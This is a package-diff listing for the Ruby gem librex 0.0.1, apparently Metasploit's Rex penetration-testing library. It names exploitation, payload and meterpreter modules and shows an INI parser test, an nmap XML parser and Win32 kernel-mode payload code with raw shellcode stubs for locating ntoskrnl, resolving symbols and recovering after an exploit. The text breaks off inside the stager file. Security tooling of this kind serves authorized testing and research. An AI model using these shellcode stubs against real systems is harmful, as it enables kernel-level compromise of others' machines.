RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

@@ -0,0 +1,29 @@
+#!/usr/bin/env ruby
+$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
+require 'test/unit'
+require 'rex/parser/ini'
+class Rex::Parser::Ini::UnitTest < Test::Unit::TestCase
+	Klass   = Rex::Parser::Ini
+	TestIni = <<END
+[group1]
+cat=dog
+bird=frog
+[group2]
+salad=cake
+END
+	def test_parse
+		ini = Klass.from_s(TestIni)
+		assert_equal('dog', ini['group1']['cat'])
+		assert_equal('frog', ini['group1']['bird'])
+		assert_equal('cake', ini['group2']['salad'])
+		assert_equal(TestIni + "\n", ini.to_s)
+	end
+end

data/lib/rex/parser/nmap_xml.rb ADDED

@@ -0,0 +1,111 @@
+require 'rexml/document'
+module Rex
+module Parser
+#
+# Stream parser for nmap -oX xml output
+#
+# Yields a hash representing each host found in the xml stream.  Each host
+# will look something like the following:
+#	{
+#		"status" => "up",
+#		"addrs"  => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
+#		"ports"  => [
+#			{ "portid" => "22", "state" => "closed", ... },
+#			{ "portid" => "80", "state" => "open", ... },
+#			...
+#		]
+#	}
+#
+# Usage:
+# <tt>
+# parser = NmapXMLStreamParser.new { |host|
+#	# do stuff with the host
+# }
+# REXML::Document.parse_stream(File.new(nmap_xml), parser)
+# </tt>
+# -- or --
+# <tt>
+# parser = NmapXMLStreamParser.new
+# parser.on_found_host = Proc.new { |host|
+#	# do stuff with the host
+# }
+# REXML::Document.parse_stream(File.new(nmap_xml), parser)
+# </tt>
+#
+# This parser does not maintain state as well as a tree parser, so malformed
+# xml will trip it up.  Nmap shouldn't ever output malformed xml, so it's not
+# a big deal.
+#
+class NmapXMLStreamParser
+	attr_accessor :on_found_host
+	def initialize(&block)
+		reset_state
+		on_found_host = block if block
+	end
+	def reset_state
+		@host = { "status" => nil, "addrs" => {}, "ports" => [] }
+	end
+	def tag_start(name, attributes)
+		case name
+		when "address"
+			@host["addrs"][attributes["addrtype"]] = attributes["addr"]
+			if (attributes["addrtype"] =~ /ipv[46]/)
+				@host["addr"] = attributes["addr"]
+			end
+		when "osclass"
+			@host["os_vendor"]   = attributes["vendor"]
+			@host["os_family"]   = attributes["osfamily"]
+			@host["os_version"]  = attributes["osgen"]
+			@host["os_accuracy"] = attributes["accuracy"]
+		when "osmatch"
+			if(attributes["accuracy"].to_i == 100)
+				@host["os_match"] = attributes["name"]
+			end
+		when "uptime"
+			@host["last_boot"]   = attributes["lastboot"]
+		when "hostname"
+			if(attributes["type"] == "PTR")
+				@host["reverse_dns"] = attributes["name"]
+			end
+		when "status"
+			# <status> refers to the liveness of the host; values are "up" or "down"
+			@host["status"] = attributes["state"]
+		when "port"
+			@host["ports"].push(attributes)
+		when "state"
+			# <state> refers to the state of a port; values are "open", "closed", or "filtered"
+			@host["ports"].last["state"] = attributes["state"]
+		when "service"
+			# Store any service info with the associated port.  There shouldn't
+			# be any collisions on attribute names here, so just merge them.
+			@host["ports"].last.merge!(attributes)
+		end
+	end
+	def tag_end(name)
+		case name
+		when "host"
+			on_found_host.call(@host) if on_found_host
+			reset_state
+		end
+	end
+	# We don't need these methods, but they're necessary to keep REXML happy
+	def text(str); end
+	def xmldecl(version, encoding, standalone); end
+	def cdata; end
+	def comment(str); end
+	def instruction(name, instruction); end
+	def attlist; end
+end
+end
+end

data/lib/rex/payloads.rb ADDED

	@@ -0,0 +1 @@
1	+ require 'rex/payloads/win32'

data/lib/rex/payloads/win32.rb ADDED

	@@ -0,0 +1,2 @@
1	+ require 'rex/payloads/win32/common'
2	+ require 'rex/payloads/win32/kernel'

data/lib/rex/payloads/win32/common.rb ADDED

@@ -0,0 +1,26 @@
+module Rex
+module Payloads
+module Win32
+module Common
+	#
+	# Returns a stub that resolves the location of a symbol and then
+	# calls it.  Refer to the following link for more details:
+	#
+	# http://uninformed.org/index.cgi?v=3&a=4&p=10
+	#
+	def self.resolve_call_sym
+		"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
+		"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
+		"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
+		"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
+		"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
+		"\x61\xff\xe0"
+	end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel.rb ADDED

@@ -0,0 +1,53 @@
+module Rex
+module Payloads
+module Win32
+require 'rex/payloads/win32/kernel/common'
+require 'rex/payloads/win32/kernel/recovery'
+require 'rex/payloads/win32/kernel/stager'
+require 'rex/payloads/win32/kernel/migration'
+module Kernel
+	#
+	# Constructs a kernel-mode payload using the supplied options.  The options
+	# can be:
+	#
+	# Recovery      : The recovery method to use, such as 'spin'.
+	# Stager        : The stager method to use, such as 'sud_syscall_hook'.
+	# RecoveryStub  : The recovery stub that should be used, if any.
+	# UserModeStub  : The user-mode payload to execute, if any.
+	# KernelModeStub: The kernel-mode payload to execute, if any.
+	#
+	def self.construct(opts = {})
+		payload = nil
+		# Generate the recovery stub
+		if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
+			opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
+		end
+		# Append supplied recovery stub information in case there is some
+		# context specific recovery that must be done.
+		if opts['AppendRecoveryStub']
+			opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
+		end
+		# Generate the stager
+		if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
+			payload = Kernel::Stager.send(opts['Stager'], opts)
+		# Or, generate the migrator
+		elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
+			payload = Kernel::Migration.send(opts['Migrator'], opts)
+		else
+			raise ArgumentError, "A stager or a migrator must be specified."
+		end
+		payload
+	end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/common.rb ADDED

@@ -0,0 +1,54 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+require 'rex/payloads/win32/common'
+#
+# This class provides common methods that may be shared across more than
+# one kernel-mode payload.  Many of these are from the following paper:
+#
+# http://www.uninformed.org/?v=3&a=4&t=sumry
+#
+module Common
+	#
+	# Returns a stub that will find the base address of ntoskrnl and
+	# place it in eax.  This method works by using an IDT entry.  Credit
+	# to eEye.
+	#
+	def self.find_nt_idt_eeye
+		"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
+	end
+	#
+	# Returns a stub that will find the base address of ntoskrnl and
+	# place it in eax.  This method uses a pointer found in KdVersionBlock.
+	#
+	def self.find_nt_kdversionblock
+		"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
+	end
+	#
+	# Returns a stub that will find the base address of ntoskrnl and
+	# place it in eax.  This method uses a pointer found in the
+	# processor control region as a starting point.
+	#
+	def self.find_nt_pcr
+		"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
+	end
+	#
+	# Alias for resolving symbols.
+	#
+	def self.resolve_call_sym
+		Rex::Payloads::Win32::Common.resolve_call_sym
+	end
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/migration.rb ADDED

@@ -0,0 +1,12 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+module Migration
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/recovery.rb ADDED

@@ -0,0 +1,50 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+#
+# Recovery stubs are responsible for ensuring that the kernel does not crash.
+# They must 'recover' after the exploit has succeeded, either by consuming
+# the thread or continuing it on with its normal execution.  Recovery stubs
+# will often be exploit dependent.
+#
+module Recovery
+	#
+	# The default recovery method is to spin the thread
+	#
+	def self.default(opts = {})
+		spin(opts)
+	end
+	#
+	# Infinite 'hlt' loop.
+	#
+	def self.spin(opts = {})
+		"\xf4\xeb\xfd"
+	end
+	#
+	# Restarts the idle thread by jumping back to the entry point of
+	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
+	# You can pass the 'KiIdleLoopAddress' in the options hash.
+	#
+	def self.idlethread_restart(opts = {})
+		# Default to fully patched XPSP2
+		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
+		"\x31\xC0" +                                     # xor eax,eax
+		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
+		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
+		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
+		"\x6A\x00" +                                     # push byte +0x0
+		"\xFF\xE0"                                       # jmp eax
+	end
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/stager.rb ADDED

@@ -0,0 +1,171 @@
+module Rex
+module Payloads
+module Win32
+module Kernel
+#
+# Stagers are responsible for reading in another payload and executing it.
+# The reading in of the payload may actually be as simple as copying it to
+# another location.  The executing of it may be done either directly or
+# indirectly.
+#
+module Stager
+	#
+	# Works on Vista, Server 2008 and 7.
+	#
